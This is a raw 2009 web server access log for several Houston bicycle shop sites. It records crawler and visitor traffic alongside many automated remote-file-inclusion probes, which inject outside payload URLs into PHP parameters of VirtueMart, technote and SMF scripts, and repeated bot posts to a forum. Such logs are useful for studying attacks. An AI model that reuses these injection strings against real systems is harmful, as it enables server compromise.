119.63.198.44 - - [12/Jul/2009:08:32:03 -0700] "GET /bullitinboard/viewtopic.php?p=15529 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
119.63.198.31 - - [12/Jul/2009:08:33:11 -0700] "GET /bullitinboard/viewtopic.php?p=15315 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
211.203.180.144 - - [12/Jul/2009:08:36:11 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
211.203.180.144 - - [12/Jul/2009:08:36:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
76.12.17.218 - - [12/Jul/2009:08:44:49 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.12.17.218 - - [12/Jul/2009:08:44:49 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.12.17.218 - - [12/Jul/2009:08:44:49 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:49:32 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:49:32 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:49:33 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:50:43 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:50:43 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:50:43 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:50:58 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:50:58 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:50:59 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:51:32 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:51:32 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:08:51:32 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:09:17:24 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
211.236.242.164 - - [12/Jul/2009:09:18:36 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:09:19:53 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:09:21:46 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [12/Jul/2009:09:23:00 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [12/Jul/2009:09:23:00 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [12/Jul/2009:09:23:00 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [12/Jul/2009:09:23:17 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [12/Jul/2009:09:23:17 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [12/Jul/2009:09:23:18 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.phs-holod.ru/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:09:26:36 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
207.58.155.223 - - [12/Jul/2009:09:31:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://5euroshirts.com/modules/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "houstonbikeshop.com"
207.58.155.223 - - [12/Jul/2009:09:31:08 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://5euroshirts.com/modules/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:09:33:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.litulan.ru///other/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:09:33:28 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.litulan.ru///other/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:09:33:33 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.litulan.ru///other/index1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.200.199.144 - - [12/Jul/2009:09:35:09 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.200.199.144 - - [12/Jul/2009:09:35:09 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.200.199.144 - - [12/Jul/2009:09:35:10 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:09:35:27 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
77.221.130.22 - - [12/Jul/2009:09:47:51 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.svbikes.com"
77.221.130.22 - - [12/Jul/2009:09:47:51 -0700] "GET /translations/German.txt//tools/send_reminders.php?noSet=0&includedir=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.svbikes.com"
77.221.130.22 - - [12/Jul/2009:09:47:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.svbikes.com"
77.221.130.22 - - [12/Jul/2009:09:47:52 -0700] "GET /translations/German.txt//tools/send_reminders.php?noSet=0&includedir=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.svbikes.com"
77.221.130.22 - - [12/Jul/2009:09:47:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.svbikes.com"
77.221.130.22 - - [12/Jul/2009:09:47:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.svbikes.com"
77.221.130.14 - - [12/Jul/2009:09:51:57 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cisc.at/survey/classes/core/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "houstonbikeshop.com"
212.158.167.98 - - [12/Jul/2009:09:56:11 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
212.158.167.98 - - [12/Jul/2009:09:56:11 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
212.158.167.98 - - [12/Jul/2009:09:56:11 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
65.66.217.181 - - [12/Jul/2009:09:57:49 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7" "www.svbikes.com"
65.66.217.181 - - [12/Jul/2009:09:57:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7" "www.svbikes.com"
65.66.217.181 - - [12/Jul/2009:09:57:52 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.7) Gecko/2009021906 Firefox/3.0.7" "www.svbikes.com"
81.19.66.38 - - [12/Jul/2009:10:02:03 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:10:02:04 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:10:02:05 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:10:02:05 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jul/2009:10:02:06 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
208.80.195.121 - - [12/Jul/2009:10:02:34 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; FunWebProducts; .NET CLR 1.1.4322; HbTools 4.8.2)" "bicyclestoreshouston.com"
211.236.242.164 - - [12/Jul/2009:10:04:19 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:19 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:19 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:31 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:31 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:32 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:47 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:48 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.236.242.164 - - [12/Jul/2009:10:04:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:10:05:39 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:10:05:39 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:10:05:39 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:10:05:39 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:10:05:40 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:10:05:40 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:10:05:40 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.139.129 - - [12/Jul/2009:10:05:40 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.67.243 - - [12/Jul/2009:10:06:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:10:06:59 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.234.107.233 - - [12/Jul/2009:10:07:01 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://yongsin.es.kr/oil2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
213.171.225.234 - - [12/Jul/2009:10:08:35 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
213.171.225.234 - - [12/Jul/2009:10:08:35 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
213.171.225.234 - - [12/Jul/2009:10:08:37 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
94.178.223.236 - - [12/Jul/2009:10:12:12 -0700] "GET /bullitinboard/viewtopic.php?p=11114&sid=e2636c9e9c6e7c5ad403d89f15443edc HTTP/1.0" 200 438 "http://www.svbikes.com/bullitinboard//viewtopic.php?p=11114&sid=e2636c9e9c6e7c5ad403d89f15443edc" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.svbikes.com"
94.178.223.236 - - [12/Jul/2009:10:12:12 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.svbikes.com"
94.178.223.236 - - [12/Jul/2009:10:12:13 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "www.svbikes.com"
99.27.99.245 - - [12/Jul/2009:10:12:29 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.svbikes.com"
99.27.99.245 - - [12/Jul/2009:10:12:30 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.svbikes.com"
63.214.229.122 - - [12/Jul/2009:10:23:28 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.1" 200 533 "http://us.yhs.search.yahoo.com/avg/search?fr=yhs-avg&type=yahoo_avg_hs2-tb-web_us&p=www.blackdicks.com" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "bicyclestoreshouston.com"
63.214.229.122 - - [12/Jul/2009:10:23:29 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "bicyclestoreshouston.com"
63.214.229.122 - - [12/Jul/2009:10:23:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "bicyclestoreshouston.com"
200.105.207.244 - - [12/Jul/2009:10:27:17 -0700] "GET /logs//smf/count.php?sourcedir=http://5euroshirts.com/modules/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "houstonbikeshop.com"
200.105.207.244 - - [12/Jul/2009:10:27:17 -0700] "GET /smf/count.php?sourcedir=http://5euroshirts.com/modules/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "houstonbikeshop.com"
63.214.229.122 - - [12/Jul/2009:10:29:23 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.1" 200 533 "http://us.yhs.search.yahoo.com/avg/search?p=www.blackdicks.com&type=yahoo_avg_hs2-tb-web_us&fr=yhs-avg&YST_b=1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:10:58:44 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:10:58:44 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jul/2009:11:07:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:11:07:31 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:11:13:44 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:11:13:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:11:28:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
82.194.87.219 - - [12/Jul/2009:11:37:10 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vusaeurope.eu/cms/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
91.121.150.170 - - [12/Jul/2009:11:37:12 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jul/2009:11:46:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
74.6.22.179 - - [12/Jul/2009:11:48:33 -0700] "GET /bullitinboard/viewtopic.php?p=15203 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
